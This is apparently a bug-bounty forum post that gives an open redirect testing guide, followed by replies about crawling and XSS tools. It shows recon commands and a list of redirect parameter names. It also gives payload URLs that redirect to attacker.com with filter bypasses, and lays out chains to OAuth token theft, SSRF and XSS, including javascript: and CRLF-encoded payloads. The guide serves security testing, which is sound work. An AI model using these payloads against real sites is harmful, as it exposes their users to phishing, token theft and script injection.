Open Redirection Guide

Identifing possible vulnerable endpoints:

  • waybackurls + hakrawler + gf

    1. cat subdomains | waybackurls | tee -a urls
    2. cat subdomains | hakrawler -depth 3 -plain | tee -a urls
    3. gf redirect urls

    using redirect.json with gf:

{
    "flags" : "-HanrE",
    "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
}
  • Google dorks
    site:domain.com inurl:[PARAMETER] using a parameter list
  • Manual inspection by navigating the webapp and intercepting the requests

Confirm and exploit:

* https://company.com/?redirect=http://attacker.com
* https://company.com/?redirect=http://company.com.attacker.com
* https://company.com/?redirect=https://[email protected]
* https://company.com/?redirect=//attacker.com
* https://company.com/?redirect=http://attacker.com#company.com
* https://company.com/?redirect=http://attacker.com?company.com
* https://company.com/?redirect=http://attacker.com/company.com
* https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ

Using special characters:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 。

Special characters’ source

Escalating to other vulnerabilities:

Open Redirect + Miconfigured OAuth App => OAuth Token Stealing
Open Redirect + Filtered SSRF => SSRF
Open Redirect + CRLFi => XSS
Open Redirect + javascript URI => XSS

Source

Escalate to XSS

  • https://company.com/?redirect=javascript:alert(1)
  • https://company.com/?redirect=javascript:prompt(1)

Escalate to XSS using CRLFi

  • https://company.com/?redirect=java%0d%0ascript%0d%0a:alert(0)
7 Likes

Thanks so much for pointing out hakrawler! Been looking for a fast go HTTP crawler like this!

Have you tried doing XSS analysis too with kxss? A similar loop?

2 Likes

I haven’t actually used it yet but I saw this tweet the other day and I would like to try it out

1 Like

Looks really interesting.

I’d love to put together a few bug-bounty esq hacks and automation tips for pentests so I can transfer the bug-founding power of the community into something I can fire off and get alerts for.

Almost be epic to chain together a bunch of stuff and have it give us Discord notifications through a webhook everytime it finds something!

3 Likes

ALSO: Do you happen to know where I can find kxss?

EDIT: Found it, in toms hacks repo.

2 Likes

Yup! tomnomnom’s tools are sick!

1 Like

I don’t know Linux or web but this looks detailed nevertheless!

2 Likes

I think you should use dalfox instead of kxss

2 Likes

Do you find it works better?

What are the key benefits / differentiators that you see?

I’ve seen it and I actually want to try it for a long time! So, will do :smile: I also sourced hahwul under the special characters

2 Likes

You NEED to share your findings when you get some basics up.

1 Like

I didn’t try kxss but I see it as an old thing ! So no idea about the difference … but I’m sure you’ll like dalfox :blush:

2 Likes